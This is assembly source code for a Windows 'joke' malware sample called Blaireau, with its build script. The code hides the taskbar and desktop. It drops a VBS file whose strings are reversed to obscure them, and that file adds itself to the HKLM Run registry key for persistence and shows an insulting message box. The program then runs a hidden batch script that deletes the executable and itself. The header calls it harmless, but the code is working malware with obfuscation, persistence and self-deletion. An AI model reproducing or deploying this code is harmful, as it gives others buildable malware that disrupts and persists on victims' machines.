Win32/BadJoke.Blaireau.A

1. ; Name: Win32/BadJoke.Blaireau.A
2. ; Code: Xylitol - xylitol☆temari.fr
3. ; Size: 3Kb - 4b4726c7a9126b151d177f7c789f90bd
4. ; Test: Windows XP SP3
5. ; Date: 16/06/2014
6. ; Desc: Hide the taskbar drop a VBS and auto-destruct
7. ; This source is considered dangerous although this will not harm your computer.
8. ; This was done for fun and entertainment purposes only.
9.  
10. ;MAKE.BAT:
11. ;@echo off
12. ;set path=\masm32\bin
13. ;set lib=\masm32\lib
14. ;set name=Blaireau
15. ;set rsrc=rsrc
16. ;ml.exe /c /coff "%name%".asm
17. ;link.exe /SUBSYSTEM:WINDOWS /opt:nowin98 /LIBPATH:"%lib%" "%name%".obj
18. ;del *.OBJ
19. ;pause
20. ;@echo on
21. ;cls
22.  
23. ; #########################################################################
24.  
25.       .386
26.       .model flat, stdcall
27.       option casemap :none   ; case sensitive
28.  
29. ; #########################################################################
30.  
31.       include \masm32\include\windows.inc
32.       include \masm32\include\user32.inc
33.       include \masm32\include\kernel32.inc
34.       include \masm32\include\shell32.inc
35.       include \masm32\macros\macros.asm
36.      
37.       includelib \masm32\lib\shell32.lib
38.       includelib \masm32\lib\user32.lib
39.       includelib \masm32\lib\kernel32.lib
40.  
41. ; #########################################################################
42.  
43. .data?
44. szlen       dd      ?
45. szReversed  db      512 dup(?)
46. tmpFilePath     db      512 dup(?)
47. payload     db      512 dup(?)
48.  
49. .data
50. shell       db "Shell_TrayWnd",0
51. explorer    db "Progman",0
52. Filename    db "Blaireau.vbs",0
53. Filename2   db "Blaireau.bat",0
54.  
55. payload1    db " tpircsw",022h,",",022h,"kcirreD\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\ENIHCAM_LACOL_YEKH",022h," etirWgeR.tideger",13,10
56.         db ")",022h,"llehS.tpircSW",022h,"(tcejbOetaerC = tideger teS",13,10
57.         db ")1(redloFlaicepSteG.osf = metsysrid teS",13,10
58.         db "txeN emuseR rorrE nO",13,10
59.         db ")",022h,"tcejbOmetsySeliF.gnitpircS",022h,"(tcejbOetaerC = osf teS",13,10
60.         db "metsysrid ,osf miD",0
61.            
62. payload2    db 022h,"ékiN T",022h," xobgsM",13,10
63.             db 022h,0
64.            
65. melt        db ":repeat",13,10
66.         db "if not exist ",022h,"blaireau.exe",022h," goto exit",13,10
67.         db "attrib -R -S -H ",022h,"blaireau.exe",022h,13,10
68.         db "erase ",022h,"blaireau.exe",13,10
69.         db "goto repeat",13,10
70.         db ":exit",13,10
71.         db "attrib -R -S -H ",022h,"Blaireau.bat",022h,13,10
72.         db "erase ",022h,"Blaireau.bat",022h,0
73.  
74. .code
75. start:
76.         invoke GetTempPath, 255,addr tmpFilePath
77.         invoke lstrcat,addr tmpFilePath,addr Filename
78.        
79.         invoke lstrlen, addr tmpFilePath
80.         mov ecx,eax
81.         mov esi, offset tmpFilePath
82.         call lstrrev
83.        
84.         invoke lstrcpy,addr payload,addr payload2
85.         invoke lstrcat,addr payload,addr szReversed
86.         invoke lstrcat,addr payload,addr payload1
87.        
88. DlgProc proc
89.         hWin    :DWORD,
90.         uMsg    :DWORD,
91.         wParam  :DWORD,
92.         lParam  :DWORD
93.     LOCAL   hFile   :DWORD,
94.         NumBytes:DWORD
95.  
96. invoke FindWindow,addr shell,NULL ;  Get handle first then hide it.
97. .if eax != 0
98.     invoke ShowWindow,eax,SW_HIDE ; use SW_SHOW to show it again
99. .endif
100. invoke FindWindow,addr explorer,NULL
101. .if eax != 0
102. invoke ShowWindow,eax,SW_HIDE
103. .endif
104.  
105.         invoke lstrlen, addr payload
106.         mov ecx,eax
107.         mov esi, offset payload
108.         call lstrrev
109.  
110.         invoke lstrlen,addr szReversed
111.         mov szlen,eax
112.  
113.         invoke CreateFile,addr tmpFilePath,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL
114.         mov hFile,eax
115.         invoke WriteFile, hFile,addr szReversed, szlen, addr NumBytes, NULL
116.  
117.         invoke CloseHandle,hFile
118.         mov szlen,0
119.  
120.         invoke lstrlen,addr melt
121.         mov szlen,eax
122.  
123.         invoke CreateFile,addr Filename2,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL
124.         mov hFile,eax
125.         invoke WriteFile, hFile,addr melt, szlen, addr NumBytes, NULL
126.         invoke CloseHandle,hFile
127.         mov szlen,0
128.        
129.         invoke ShellExecute,hWin,chr$("open"),addr tmpFilePath,NULL,NULL,SW_SHOWNORMAL
130.         invoke ShellExecute,hWin,chr$("open"),addr Filename2,NULL,NULL,SW_HIDE
131.         push 0
132.         call ExitProcess
133.  
134. DlgProc endp
135.  
136. lstrrev proc
137.     lea edi, offset szReversed
138.     xor ebx, ebx
139.         Reversor:
140.             mov al, byte ptr[esi+ecx-1]
141.             mov byte ptr[edi+ebx], al
142.             inc ebx
143.             dec ecx
144.         jnz Reversor
145.             mov byte ptr[edi+ebx], 0
146.     Ret
147. lstrrev endp
148.  
149. end start